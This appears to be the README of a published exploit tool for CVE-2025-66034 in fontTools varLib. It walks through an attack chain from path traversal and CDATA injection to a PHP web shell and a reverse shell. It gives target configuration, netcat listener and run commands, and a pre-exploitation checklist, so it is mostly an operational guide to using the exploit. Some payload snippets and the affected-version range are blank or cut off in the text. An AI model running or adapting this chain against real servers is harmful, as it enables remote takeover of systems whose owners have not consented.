## https://sploitus.com/exploit?id=0AA09EA9-9F85-51FB-9195-793ED4BAD01D
# font_varlib.py โ CVE-2025-66034
> **fontTools varLib** โ Arbitrary File Write + XML Injection โ Remote Code Execution






---
## Table of Contents
- [Overview](#overview)
- [Vulnerability Details](#vulnerability-details)
- [Attack Chain](#attack-chain)
- [Requirements](#requirements)
- [Installation](#installation)
- [Configuration](#configuration)
- [Usage](#usage)
- [How It Works](#how-it-works)
- [Vulnerable Code](#vulnerable-code)
- [Pre-Exploitation Checklist](#pre-exploitation-checklist)
- [Tested On](#tested-on)
- [Disclaimer](#disclaimer)
- [References](#references)
---
## Overview
**CVE-2025-66034** is a vulnerability in the `fontTools.varLib` variable font generation pipeline. When a web application exposes this pipeline and accepts user-supplied `.designspace` files, two weaknesses chain together to achieve **unauthenticated remote code execution**.
`font_varlib.py` automates the full exploit chain โ font generation, payload crafting, upload, and reverse shell delivery.
---
## Vulnerability Details
| Field | Detail |
|-------|--------|
| CVE ID | CVE-2025-66034 |
| GHSA | GHSA-768j-98cg-p3fv |
| Package | fonttools (pip) |
| Affected Range | `>= 4.33.0, ` CDATA sections allow a split sequence (`]]]]>`) to smuggle raw PHP past the XML parser into the written output file |
---
## Attack Chain
```
Attacker crafts malicious .designspace
โ
โโโ
โ โโโ PATH TRAVERSAL
โ os.path.join(output_dir, absolute_path)
โ โ output_dir discarded โ write to web root
โ
โโโ ]]]]>]]>
โโโ XML INJECTION
CDATA split embeds raw PHP
into the output font binary
โ
โผ
fontTools.varLib.main() processes file server-side
โ
โผ
shell.php written to web-accessible directory
โ
โผ
GET /files/shell.php โ PHP executes โ reverse shell callback
โ
โผ
RCE as www-data
```
---
## Requirements
**Python:** 3.9+
**Dependencies:**
```bash
pip install fonttools requests
```
**System:**
```
nc (netcat) โ required for auto listener mode (--no-listen skips this)
```
---
## Installation
```bash
git clone https://github.com/yourhandle/font_varlib
cd font_varlib
pip install fonttools requests
```
---
## Configuration
Before running, open `font_varlib.py` and update the config block at the top of the file to match your target. Every value has an inline comment explaining what it is and how to find the correct value.
```python
# โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
# DEFAULTS
# Change these to match your target before running.
# All values can also be overridden at runtime via CLI flags โ see --help.
# โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
# Base URL of the upload host (the site that accepts the .designspace)
UPLOAD_HOST = "http://target.htb"
# Path on the upload host that processes the multipart form POST
# Confirm with Burp โ look for the POST after clicking the generate button
UPLOAD_ENDPOINT = "/tools/variable-font-generator/process"
# Absolute filesystem path on the server where output files are written
# Must be web-accessible so the shell can be triggered via HTTP
WEBROOT = "/var/www/target.htb/public/files"
# Base URL used to fetch/trigger the written shell file
# Maps to WEBROOT on disk
SHELL_HOST = "http://portal.target.htb/files"
# Multipart form field names โ confirm with Burp before running
# If upload silently fails (HTTP 200 but no shell), wrong field names are the cause
FIELD_DESIGNSPACE = "designspace"
FIELD_MASTERS = "masters"
# Shell filename prefix โ random suffix appended at runtime
SHELL_PREFIX = "f0nt_"
# Length of random suffix โ longer = harder to guess
SHELL_SUFFIX_LEN = 8
```
> **Tip:** Intercept a legitimate upload request in Burp Suite to confirm `UPLOAD_ENDPOINT` and the exact multipart field names before running. A mismatch in field names causes a silent failure โ the server returns HTTP 200 but no shell is written.
---
## Usage
### Basic โ auto nc listener
```bash
python3 font_varlib.py --ip --port
```
### Manual listener โ start nc yourself
```bash
# Terminal 1 โ start your listener
nc -lvnp 4444
# Terminal 2 โ run exploit without auto listener
python3 font_varlib.py --ip --port 4444 --no-listen
```
### Custom target โ override all defaults at runtime
```bash
python3 font_varlib.py \
--ip 10.10.14.5 \
--port 4444 \
--upload http://target.htb/tools/variable-font-generator/process \
--webroot /var/www/html/files \
--shell http://target.htb/files
```
### Full options reference
| Argument | Required | Default | Description |
|----------|----------|---------|-------------|
| `--ip` | โ | โ | Attacker listener IP |
| `--port` | โ | โ | Attacker listener port |
| `--upload` | | `UPLOAD_HOST + UPLOAD_ENDPOINT` | Upload endpoint (POST) |
| `--webroot` | | `WEBROOT` | Server-side filesystem write path (must be web-accessible) |
| `--shell` | | `SHELL_HOST` | Base URL used to trigger the written shell |
| `--no-listen` | | `false` | Skip auto nc listener โ trigger only |
---
## How It Works
### Step 1 โ Font Generation
Two minimal but structurally valid `.ttf` source files are generated programmatically using `fontTools.FontBuilder`. `varLib` requires at least two axis masters to process a variable font โ these satisfy that requirement without needing real font files on disk.
### Step 2 โ Payload Crafting
A malicious `.designspace` XML file is constructed embedding both attack primitives:
**Primitive 1 โ XML Injection via CDATA split:**
```xml
]]]]>]]>
```
The sequence `]]]]>` terminates the current CDATA block and immediately opens a new one. The XML parser processes this as valid markup, but `varLib` serializes the content verbatim into the output file โ embedding raw PHP into the font binary.
**Primitive 2 โ Path Traversal via filename attribute:**
```xml
```
`varLib` constructs the output path as:
```python
output_path = os.path.join(output_dir, filename)
```
When `filename` is an absolute path, Python's `os.path.join()` discards `output_dir` entirely. No sanitization is applied in affected versions.
### Step 3 โ Upload
The `.designspace` and both `.ttf` files are sent as a multipart POST to the target's font generation endpoint using field names confirmed from Burp.
### Step 4 โ Trigger
An HTTP GET to the written `.php` file executes the reverse shell, which connects back to the attacker's `nc` listener via `fsockopen` + `proc_open` โ no curl, wget, or Python required on the target.
---
## Vulnerable Code
**`fontTools/varLib/__init__.py` (affected versions):**
```python
filename = vf.filename # attacker-controlled, unsanitised
output_path = os.path.join(output_dir, filename) # path traversal via absolute path
vf.save(output_path) # arbitrary file write
```
**Patch in 4.60.2** โ enforces `os.path.basename()` on `filename` before constructing `output_path`, stripping all path traversal sequences.
---
## Pre-Exploitation Checklist
Before running, confirm all of the following:
```
[ ] fonttools version on target is >= 4.33.0 and < 4.60.2
[ ] Target accepts .designspace + .ttf file uploads
[ ] Backend calls fontTools.varLib.main() on the uploaded .designspace
[ ] Upload form field names confirmed with Burp (designspace + masters)
[ ] WEBROOT is web-accessible from outside
[ ] WEBROOT is writable by the web process (www-data or equivalent)
[ ] SHELL_HOST (--shell) is reachable from your machine
[ ] Target hostname are in /etc/hosts
```
---
## Tested On
| Environment | fonttools Version | Result |
|-------------|------------------|--------|
| Ubuntu 22.04 / Python 3.11 | 4.59.0 | โ Confirmed |
| HackTheBox โ VariaType | 4.59.0 | โ Confirmed |
---
## Disclaimer
This tool is provided for **educational and authorized security research purposes only**.
Do not use against any system you do not own or have **explicit written permission** to test. The author assumes no liability for misuse or any damage caused by this software.
---
## References
| Resource | Link |
|----------|------|
| NVD โ CVE-2025-66034 | https://nvd.nist.gov/vuln/detail/CVE-2025-66034 |
| GitHub Advisory โ GHSA-768j-98cg-p3fv | https://github.com/advisories/GHSA-768j-98cg-p3fv |
| fontTools Security Advisory | https://github.com/fonttools/fonttools/security/advisories/GHSA-768j-98cg-p3fv |
| Patch Commit โ a696d5b | https://github.com/fonttools/fonttools/commit/a696d5ba93270d5954f98e7cab5ddca8a02c1e32 |
| fontTools Project | https://github.com/fonttools/fonttools |